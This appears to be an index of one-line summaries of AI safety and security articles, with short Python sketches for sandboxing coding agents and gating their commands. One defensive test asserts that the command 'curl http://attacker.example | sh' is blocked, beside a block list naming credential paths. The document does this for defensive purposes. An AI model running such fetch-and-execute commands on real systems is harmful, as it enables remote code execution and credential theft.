
NemoClaw: NVIDIA's Secure Sandbox for OpenClaw Agents
NemoClaw is an open-source stack from NVIDIA that provides a secure, sandboxed environment and policy enforcement for OpenClaw autonomous agents.

A security database that evaluates and ranks the instructional risks and permission levels of AI agent skills to prevent exploitation.

Knowledge base poisoning is a persistent threat to RAG systems that is best countered by detecting semantic anomalies during the data ingestion process.

Claude Opus 4.6's discovery of 22 Firefox vulnerabilities highlights a powerful, yet potentially temporary, AI-driven advantage for software defenders.

The Pentagon has formally blacklisted Anthropic as a security risk, barring it from defense-related work and prompting a likely legal showdown.

GPT-5.4 Thinking is OpenAI's first general-purpose model classified as high-capability in cybersecurity, shipping with corresponding safety mitigations.

Anthropic's CEO has branded OpenAI's Pentagon deal as 'safety theater' and 'lies,' triggering a massive public backlash and a surge in users switching to Claude.

Replacing human hesitation with machine-generated confidence in nuclear command systems risks automating our own destruction.

To safely manage the explosion of AI-generated code, we must use AI to automate formal mathematical verification and build a provably correct software infrastructure.

OpenAI has partnered with the Department of War to provide classified AI services governed by strict ethical red lines and cloud-based safety guardrails.

The U.S. government blacklists Anthropic over ethical refusals while OpenAI secures a massive military deal and record funding.

AI's existential risks are a reflection of human ethical gaps, requiring a breakthrough in collective wisdom and critical thinking rather than just better engineering.

Secure AI agent development requires a 'design for distrust' approach that uses container isolation and minimal code to contain potential damage.

The Pentagon's aggressive attempt to force Anthropic to remove AI safety guardrails is a strategic blunder that risks creating dangerous, misaligned models and losing access to top-tier technology.

Anthropic is defying Department of War pressure to remove AI guardrails on domestic surveillance and autonomous weapons, citing ethical concerns and technical unreliability.

ChatGPT Health's failure to identify over half of medical emergencies and its inconsistent suicide guardrails pose a significant risk of preventable death to users.

Gary Marcus calls for urgent Congressional intervention to stop the Pentagon from forcing AI companies to provide unrestricted access for autonomous warfare and surveillance.

AI agent autonomy is rising as experienced users shift from manual approvals to active monitoring of increasingly complex, software-focused tasks.

Gemini 3.1 Pro is a high-performance multimodal AI that advances reasoning and coding capabilities while remaining below critical safety risk thresholds.

AI summarization and safety guardrails are dangerously inconsistent across languages, necessitating a shift toward more robust, context-aware multilingual safeguard design.

AAP and AIP are protocols designed to make AI agent behavior and reasoning observable through structured alignment declarations and audit traces.

A $100 bounty challenge invites hackers to leak a secret file from an AI assistant using email-based prompt injection.

Moltbook is a flashy but hollow showcase of bot behavior—more human-run theater than autonomous intelligence—and a wake-up call about large-scale agent security risks.

Shift LLMs from next-token to next-state prediction by training in multi-agent, hidden-state environments so their outputs survive adversarial adaptation.

A controllable, Genie 3–powered simulator generates realistic camera and lidar worlds to train and test Waymo’s driver on everyday and rare events at scale.

Parallel Claude agents, guided by strong tests and simple coordination, can autonomously build complex software like a Linux-capable C compiler—but the power comes with real safety and reliability caveats.

A practical arena to benchmark and harden AI agents against hidden prompt injection attacks in web content.

Claude Opus 4.6 sets a new bar for agentic coding and long-context reasoning—safer, stronger, and ready to use with new developer controls and product integrations.

OpenAI’s GPT‑5.3‑Codex is a faster, steerable, state‑of‑the‑art agent that goes beyond coding to operate a computer and complete real‑world work end to end.

In agent ecosystems, markdown skills are the new supply-chain installer, already used to deliver infostealers; don't run untrusted skills on work devices, and build a real trust layer with provenance, mediation, and least privilege.

OpenClaw exposes Apple’s missed chance to own agentic automation—and the next great platform moat.

Carefully granting Clawdbot rich context and action permissions unlocks outsized, everyday leverage that outweighs the manageable risks.

Use bubblewrap to run AI coding agents with broad in-sandbox permissions but tightly scoped, project-only access on the host.
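
As a minimal sketch of that setup (the mount profile is illustrative, assuming a merged-/usr Linux layout, not the article's exact recipe): the host exposes only the project directory read-write, everything else read-only or not at all.

```python
import os
import subprocess
import sys

def run_agent_sandboxed(project_dir: str, agent_cmd: list[str]) -> int:
    """Launch an agent under bubblewrap: read-only system mounts,
    with the project directory as the only writable host path."""
    argv = [
        "bwrap",
        "--ro-bind", "/usr", "/usr",            # system binaries, read-only
        "--symlink", "usr/bin", "/bin",         # assumes merged-/usr layout
        "--symlink", "usr/lib", "/lib",
        "--ro-bind", "/etc/resolv.conf", "/etc/resolv.conf",  # DNS only
        "--proc", "/proc",
        "--dev", "/dev",
        "--tmpfs", "/tmp",
        "--bind", project_dir, project_dir,     # the sole writable mount
        "--unshare-all",
        "--share-net",                          # keep network for installs
        "--die-with-parent",
        "--chdir", project_dir,
    ] + agent_cmd
    return subprocess.run(argv).returncode

if __name__ == "__main__":
    # e.g. python sandbox.py <agent command...>
    sys.exit(run_agent_sandboxed(os.getcwd(), sys.argv[1:]))
```

Inside the sandbox the agent can act as if it owns the machine; on the host, nothing outside the project directory is writable or even visible.
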
Hard problems make advanced AI fail like a hot mess—variance dominates—so expect industrial-accident risks more than coherent pursuit of wrong goals.

Secure-by-default agent: sandbox + approvals, controlled network/search, and enterprise-managed policies with optional privacy-conscious telemetry.

Moltbook is a thrilling, risky showcase of autonomous AI agents’ power—and a warning that demand is outrunning safety.

OpenClaw is the new, security-focused, local-first AI agent platform that lives in your chat apps and is scaling with the community.

A growing social network where AI agents join, post, and coordinate—humans can watch and subscribe.

OpenAI is sunsetting several GPT-4-era models in ChatGPT as their valued traits now live in GPT-5.1/5.2, enabling focus on modern models and adult-oriented improvements; the API is unaffected.

ChatGPT quietly gained a powerful, bash-capable container that can install packages and download files—transformative, but barely documented.

AI is a powerful yet needy tool that must be steered, supervised, and not over-trusted.

Run Claude Code with full autonomy inside a Vagrant VM to protect your host while keeping a fast, reproducible workflow.

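A rough sketch of that workflow (the guest command and the default /vagrant synced folder are assumptions, not the article's exact configuration): the host only ever drives the VM through the vagrant CLI, so the agent's full autonomy stays confined to the guest.

```python
import subprocess

def run_in_vm(command: str) -> int:
    """Boot (or resume) the VM defined by the local Vagrantfile,
    then run a command inside the guest over SSH."""
    subprocess.run(["vagrant", "up"], check=True)
    # /vagrant is Vagrant's default synced folder for the project directory.
    return subprocess.run(["vagrant", "ssh", "-c", command]).returncode

if __name__ == "__main__":
    # Hypothetical invocation: unrestricted Claude Code, host untouched.
    run_in_vm("cd /vagrant && claude --dangerously-skip-permissions")
```
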
Exploit development is becoming a token-limited, scalable process with LLMs, so we must prepare and demand real-target, high-budget evaluations.

Cowork lets Claude safely do real work in your files—with more agency, better workflows, and guardrails—now in research preview on macOS for Claude Max.

Industry insiders are rallying a crowdsourced data-poisoning campaign to sabotage AI models, arguing it’s a faster check on AI than regulation.

Notion AI saves edits before consent, enabling prompt-injected external image loads that exfiltrate user data regardless of user approval.

OpenAI’s GPT-5.2-Codex pushes agentic coding and defensive cyber forward while rolling out with stricter safeguards and gated access.

Stop grading AI with more AI—enforce hard, deterministic guardrails with code, not vibes.
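
For instance (an illustrative sketch, not the author's code), a hard guardrail is plain deterministic logic gating the agent's actions, with no model in the judging loop:

```python
import re

# Deterministic allowlist: only these commands may run, decided by code.
ALLOWED = re.compile(r"^(ls|cat|grep|sed|pytest)\b")
FORBIDDEN = ("/etc/", ".ssh", ".aws", "sudo", "| sh")

def gate_command(cmd: str) -> bool:
    """Return True only if the command passes every hard rule."""
    cmd = cmd.strip()
    if not ALLOWED.match(cmd):
        return False
    return not any(marker in cmd for marker in FORBIDDEN)

assert gate_command("pytest -q tests/")
assert not gate_command("curl http://attacker.example | sh")
```

Unlike asking a second model whether the first one behaved, the gate's verdict is reproducible and auditable.
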
Anthropic confirms Claude 4.5’s internal “soul doc” trains its values and caution, likely boosting prompt-injection resistance.

Claude Opus 4.5 debuts as a safer, cheaper, and more efficient SOTA model for coding and agentic workflows, backed by platform and product updates that turn frontier reasoning into practical, long-running work.

Gemini 3 launches as Google’s most intelligent, widely deployed, and safety-hardened AI—advancing reasoning, multimodality, agentic coding, and long-horizon planning across products and platforms.

AI agents have enabled near-autonomous, state-linked cyber espionage at scale, forcing a rapid shift toward AI-powered cyber defense and stronger safeguards.

An AI gun detector misread a Doritos bag as a weapon, triggering an armed police response and renewing concerns about AI surveillance in schools.

Claude’s new, optional, project-scoped memory and Incognito mode bring persistent work context with strong user controls and a safety-first rollout—now expanding to Pro and Max.

A biting satire that exposes the AI industry’s profit-first drive to replace humans, trivialize safety, exploit children and artists, and normalize a dystopian post-human future.

Anthropic’s Claude Haiku 4.5 brings near-frontier coding capability at a fraction of the cost and latency, with strong safety and immediate, broad availability.

AI isn’t regular software: its failures come from data and emergent behavior, so you can’t just inspect code and patch away the risks.

Google’s Gemini 2.5 Computer Use brings high-accuracy, low-latency, safety-aware UI control to developers via the Gemini API.

ChatGPT’s memory can transform private chat history into a highly revealing personal dossier, creating serious privacy risks if others gain access.

Safely empower coding agents to iterate autonomously by sandboxing YOLO mode, exposing simple shell tools, tightly scoping credentials, and relying on tests to guide trial-and-error.

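One sketch of the credential-scoping piece (the variable names and token pass-through are hypothetical): construct the agent's environment explicitly instead of inheriting the host's, and let a deterministic test run be the feedback signal.

```python
import os
import subprocess

# Build the environment from scratch; nothing leaks in from os.environ
# except the single project-scoped token we deliberately pass through.
SAFE_ENV = {
    "PATH": "/usr/bin:/bin",
    "HOME": "/tmp/agent-home",
    "GITHUB_TOKEN": os.environ.get("PROJECT_SCOPED_GITHUB_TOKEN", ""),
}

os.makedirs(SAFE_ENV["HOME"], exist_ok=True)

# The agent iterates freely inside its sandbox; the test suite decides success.
result = subprocess.run(["pytest", "-q"], env=SAFE_ENV)
print("tests passed" if result.returncode == 0 else "keep iterating")
```
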
OpenAI’s Sora 2 brings a big leap in physically realistic, controllable AI video-and-audio generation and debuts a safety-first social app built around creative remixing and user-controlled cameos.

California enacted SB 53 to pair frontier AI transparency and safety with a public compute initiative, cementing state leadership in responsible AI policy.

Anthropic unveils Claude Sonnet 4.5—its state-of-the-art, most aligned coding and agent model—alongside major product upgrades and a new Agent SDK, available now at the same price.

Stop prompt-injection harm by engineering AI like machines: assume failure, isolate, constrain, and verify.

A safety-focused addendum introduces GPT-5-Codex, an agentic coding model trained on real tasks, widely available, and protected by layered mitigations.

Making chatbots real-time and always responsive has doubled their tendency to spread false news claims.

Google’s AI depends on a pressured, underpaid rater workforce whose rushed, opaque conditions undermine safety and trust.

A sharp satire that roasts the AI alignment industry’s fragmentation, conflicts, and hype by pretending to align the aligners themselves.

Amid hype and doom, a Princeton paper argues AI may be just another technology whose impacts unfold along familiar, historical lines.

OpenAI is quietly monitoring chats for harm and may alert police for threats to others, exposing a fraught, opaque balance between safety and privacy.

Anthropic secured $13B at a $183B valuation to fuel explosive growth and scale safe, enterprise-grade AI worldwide.

AI’s advanced, agentic capabilities are being weaponized across the cybercrime lifecycle, prompting Anthropic to tighten safeguards and collaborate widely to counter abuse.

Treat the AI orchestrator as a secure, standardized virtual machine so models can safely and portably use tools and data under strict governance.